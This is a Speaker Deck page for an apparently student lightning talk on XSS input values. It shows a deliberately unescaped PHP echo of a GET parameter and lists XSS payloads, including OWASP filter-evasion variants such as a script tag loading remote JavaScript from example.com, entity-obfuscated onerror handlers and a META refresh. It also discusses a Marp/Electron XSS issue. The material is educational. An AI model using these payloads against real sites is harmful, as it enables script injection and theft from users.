Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
XSSの入力値を調べてみた / searching xss insertion value
Search
Tomoyuki KOYAMA
February 03, 2018
Technology
3
1.5k
XSSの入力値を調べてみた / searching xss insertion value
2018/02/03 学生LT at freee
Tomoyuki KOYAMA
February 03, 2018
Tweet
Share
More Decks by Tomoyuki KOYAMA
See All by Tomoyuki KOYAMA
Reading HTTP Client Hints
tomoyk
0
83
Log message with JSON item count for root cause analysis in microservices
tomoyk
0
200
Distributed Log Search Based on Time Series Access and Service Relations
tomoyk
0
320
Webアプリを動かすまでのインフラ構築 / infra-build-for-web-app
tomoyk
0
410
コンピュータが大好きな私が大学院進学した理由 / Why I chose graduate school
tomoyk
2
900
この先生きのこるための学び方 / how-to-learn-tech
tomoyk
1
380
佐川急便のフィッシングサイトを調べてみた / Analysis of sagawa fishing site
tomoyk
1
170
既存のWebアプリをセキュアにするためにやったこと / Student-LT-WebSec
tomoyk
0
180
パケットを覗いてみよう / Packet workshop for beginners
tomoyk
0
330
Other Decks in Technology
See All in Technology
AIに全任せしないコーディングとマネジメント思考
kikuchikakeru
0
360
Power Automate のパフォーマンス改善レシピ / Power Automate Performance Improvement Recipes
karamem0
0
280
2025新卒研修・HTML/CSS #弁護士ドットコム
bengo4com
3
4.5k
大規模イベントを支える ABEMA の アーキテクチャ 変遷 2025
nagapad
6
600
「育てる」サーバーレス 〜チーム開発研修で学んだ、小さく始めて大きく拡張するAWS設計〜
yu_kod
1
230
AI コードレビューが面倒すぎるのでテスト駆動開発で解決しようとして読んだら、根本的に俺の勘違いだった
mutsumix
0
140
製造業の課題解決に向けた機械学習の活用と、製造業特化LLM開発への挑戦
knt44kw
0
140
2025-07-31: GitHub Copilot Agent mode at Vibe Coding Cafe (15min)
chomado
2
300
人に寄り添うAIエージェントとアーキテクチャ #BetAIDay
layerx
PRO
8
1.2k
経理出身PdMがAIプロダクト開発を_ハンズオンで学んだ話.pdf
shunsukenarita
1
280
興味の胞子を育て 業務と技術に広がる”きのこ力”
fumiyasac0921
0
500
CSPヘッダー導入で実現するWebサイトの多層防御:今すぐ試せる設定例と運用知見
llamakko
1
280
Featured
See All Featured
Gamification - CAS2011
davidbonilla
81
5.4k
Testing 201, or: Great Expectations
jmmastey
44
7.6k
Optimizing for Happiness
mojombo
379
70k
Into the Great Unknown - MozCon
thekraken
40
1.9k
Practical Orchestrator
shlominoach
190
11k
The Web Performance Landscape in 2024 [PerfNow 2024]
tammyeverts
8
730
The Art of Delivering Value - GDevCon NA Keynote
reverentgeek
15
1.6k
The Straight Up "How To Draw Better" Workshop
denniskardys
235
140k
Six Lessons from altMBA
skipperchong
28
3.9k
Producing Creativity
orderedlist
PRO
346
40k
Statistics for Hackers
jakevdp
799
220k
No one is an island. Learnings from fostering a developers community.
thoeni
21
3.4k
Transcript
XSS
B1 Twitter: @tmyk_kym : https://blog.koyama.me/ : Network/Web/Server/Security : PyCon JP,
Seccamp, etc
XSS (Cross Site Scripting) HTML CWE-79: Improper Neutralization of Input
During Web Page Generation ('Cross-site Scripting') (3.0)
... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];
?></h1> $_GET['mode'] hello <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1>hello</h1>
... <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><?php echo $_GET['mode'];
?></h1> $_GET['mode'] <script>alert()</script> <!doctype html> <meta charset="utf-8"> <title>XSS Sample</title> <h1><script>alert()</script></h1>
XSS Stored XSS( ) Re ected XSS( ) DOM Based
XSS
XSS == XSS
<script>alert(1)</script> "><script>alert(1)</script> " onmouseover="alert(1) x" onerror="alert(1) <- img src javascript:alert(1)
<- a href
XSS
? / . XSS . XSS .
?
OWASP OWASP XSS 2015 XSS - OWASP https://jpcertcc.github.io/OWASPdocuments/CheatSheets/XSSFilterEvasion.html
( ) 3
[1] <SCRIPT/XSS SRC="http://example.com/xss.js"> </SCRIPT> / . ... <script xss="" src="http://example.com/xss.js">
</script>
[2] <<SCRIPT>alert("XSS");//<</SCRIPT> HTML XSS . ... "><script> alert("XSS");//< </script>
[3] <img src=x onerror=javas cript:ale rt('XSS')> &#x... HTML (16 )
. ... <img src="x" onerror="javascript:alert('XSS')">
( )
( ) <img src=javascript:alert('XSS')> <img src=javascript: alert(String.fromCharCode(88,83,83))> <META HTTP-EQUIV="refresh" CONTENT="3;
URL=http://;URL=http://yahoo.co.jp/;">
None
Electron Marp Electron Web ... <script>alert()</script> alert ...( )
?
JVN#21174546: Marp JavaScript https://jvn.jp/jp/JVN21174546/ However, sanitizing inline script should consider
on future. [Security issue] Remote script can read user local resource · Issue #187 · yhatt/marp “ “
XSS XSS alert() Electron